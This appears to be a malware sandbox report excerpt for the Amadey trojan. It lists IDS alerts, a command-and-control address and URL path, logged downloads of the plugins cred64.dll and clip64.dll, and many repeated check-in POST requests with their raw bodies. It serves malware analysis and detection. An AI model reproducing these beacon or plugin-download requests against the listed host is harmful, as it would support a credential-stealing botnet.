                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49806 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49807 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49808 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49809 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49810 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49811 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49812 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49813 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49814 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49815 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49816 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49817 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49818 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49819 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49820 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49821 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49822 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49823 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49824 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49825 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49826 -> 62.204.41.4:80
                            Source: Malware configuration extractor | URLs: 62.204.41.4/Gol478Ns/index.php
                            Source: global traffic | HTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1 | Host: 62.204.41.4
                            Source: global traffic | HTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 62.204.41.4 | Content-Length: 87 | Cache-Control: no-cache | Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 | Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global traffic | HTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1 | Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
